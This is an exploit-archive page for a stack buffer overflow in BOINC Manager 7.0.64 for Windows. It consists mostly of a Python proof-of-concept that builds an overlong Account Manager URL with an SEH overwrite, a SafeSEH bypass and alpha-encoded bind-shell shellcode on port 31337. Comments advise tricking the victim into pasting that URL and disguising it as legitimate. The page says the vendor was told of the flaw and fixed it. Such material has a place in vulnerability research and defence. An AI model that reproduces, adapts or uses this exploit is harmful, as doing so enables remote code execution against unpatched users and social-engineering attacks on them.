Home / exploits BOINC Manager 7.0.64 Buffer Overflow
Posted on 03 June 2013
# Exploit Title: BOINC Manager 7.0.64 Field stack based buffer overflow # Date: 26.05.2013 # Exploit Author: xis_one@STM Solutions # Vendor Homepage: http://boinc.berkeley.edu/ # Software Link: http://boinc.berkeley.edu/dl/boinc_7.0.64_windows_intelx86.exe # Version: 7.0.64 for Windows # Tested on: Windows XP SP3 Eng (32bits) # # #BOINC 7.0.64 Windows x86 (used by Seti@HOME) Manager Field stack based buffer overflow - SEH based # #BOINC is a program that lets you donate your idle computer time to science projects like #SETI@home, Climateprediction.net, Rosetta@home, World Community Grid, and many others. # #In order to exploit the vulnerability the attacker must convince the victim to use the very long URL as Account Manager URL. #This URL is generated by the exploit into the exploit.txt file. If it dosnt work on the first time - give it one more try. #The victim must follow: # #Add project -> Use account manager -> Account Manager URL # #As with all Field BOF the severity is rather low but hey watch the movie and read below # #http://www.youtube.com/watch?v=H9Hz8OPWjtM&feature=youtu.be # #Developers team @ berkley.edu was informed about the issue and released the BOINC 7.1.3 version including the fix within a week timeframe. #windows/shell/bind_tcp EXITFUNC=thread LPORT=31337 R | msfencode -e x86/alpha_upper -t c shellcode = ( "x89xe6xdbxdfxd9x76xf4x5ex56x59x49x49x49x49x43" "x43x43x43x43x43x51x5ax56x54x58x33x30x56x58x34" "x41x50x30x41x33x48x48x30x41x30x30x41x42x41x41" "x42x54x41x41x51x32x41x42x32x42x42x30x42x42x58" "x50x38x41x43x4ax4ax49x4bx4cx4bx58x4cx49x35x50" "x33x30x35x50x55x30x4cx49x4ax45x56x51x4ex32x35" "x34x4cx4bx51x42x30x30x4cx4bx31x42x44x4cx4cx4b" "x56x32x32x34x4cx4bx43x42x56x48x54x4fx4fx47x50" "x4ax57x56x36x51x4bx4fx36x51x39x50x4ex4cx47x4c" "x33x51x33x4cx53x32x46x4cx47x50x39x51x38x4fx44" "x4dx45x51x4fx37x4dx32x4cx30x46x32x31x47x4cx4b" "x46x32x42x30x4cx4bx30x42x47x4cx55x51x58x50x4c" "x4bx31x50x34x38x4dx55x39x50x33x44x51x5ax55x51" "x4ex30x50x50x4cx4bx30x48x52x38x4cx4bx56x38x51" "x30x35x51x49x43x4dx33x47x4cx37x39x4cx4bx56x54" "x4cx4bx55x51x4ex36x46x51x4bx4fx30x31x39x50x4e" "x4cx49x51x38x4fx44x4dx45x51x48x47x56x58x4dx30" "x44x35x5ax54x55x53x53x4dx4bx48x57x4bx43x4dx46" "x44x43x45x4dx32x46x38x4cx4bx56x38x56x44x43x31" "x4ex33x35x36x4cx4bx54x4cx50x4bx4cx4bx30x58x45" "x4cx35x51x58x53x4cx4bx53x34x4cx4bx35x51x38x50" "x4bx39x51x54x56x44x37x54x51x4bx51x4bx33x51x56" "x39x31x4ax50x51x4bx4fx4dx30x46x38x51x4fx30x5a" "x4cx4bx42x32x5ax4bx4dx56x31x4dx45x38x47x43x57" "x42x45x50x33x30x45x38x54x37x54x33x46x52x31x4f" "x31x44x52x48x30x4cx32x57x57x56x53x37x4bx4fx4e" "x35x4fx48x5ax30x35x51x35x50x53x30x47x59x38x44" "x30x54x36x30x53x58x51x39x4bx30x32x4bx43x30x4b" "x4fx39x45x36x30x36x30x36x30x50x50x51x50x46x30" "x47x30x56x30x42x48x4bx5ax54x4fx59x4fx4bx50x4b" "x4fx59x45x4ax37x36x51x49x4bx51x43x53x58x43x32" "x33x30x33x4ax55x39x4dx59x4ax46x52x4ax42x30x36" "x36x30x57x42x48x38x42x59x4bx50x37x53x57x4bx4f" "x39x45x30x53x50x57x55x38x4ex57x4ax49x47x48x4b" "x4fx4bx4fx59x45x46x33x56x33x50x57x52x48x43x44" "x5ax4cx47x4bx4dx31x4bx4fx38x55x30x57x4dx47x42" "x48x42x55x42x4ex30x4dx35x31x4bx4fx39x45x32x4a" "x53x30x43x5ax34x44x36x36x56x37x42x48x35x52x58" "x59x49x58x51x4fx4bx4fx39x45x4cx4bx36x56x32x4a" "x57x30x52x48x33x30x32x30x43x30x55x50x56x36x42" "x4ax55x50x43x58x50x58x39x34x56x33x4dx35x4bx4f" "x39x45x4ax33x56x33x43x5ax35x50x46x36x46x33x50" "x57x42x48x43x32x49x49x58x48x31x4fx4bx4fx58x55" "x45x51x58x43x51x39x4fx36x4cx45x5ax56x42x55x5a" "x4cx58x43x41x41") urlstart="http://boinc.unex.es/extremadurathome?longurl=" #Pre and Post - play with them to make them look like a valid long URL (some nice examples from google apps are out there) pre="C"*(1292-46) nseh="xEBx06x43x43" #XP sp 3 32bit Eng 0x018f1d3a : popad # call ebp | {PAGE_READWRITE} space outside of loaded modules to bypass safeseh NOP="x43x43" seh="x3ax1dx8fx01" post="C"*5000 buffer = urlstart + pre + nseh + seh + NOP + shellcode + post print(buffer) file = open('exploit.txt','w') file.write(buffer) file.close()
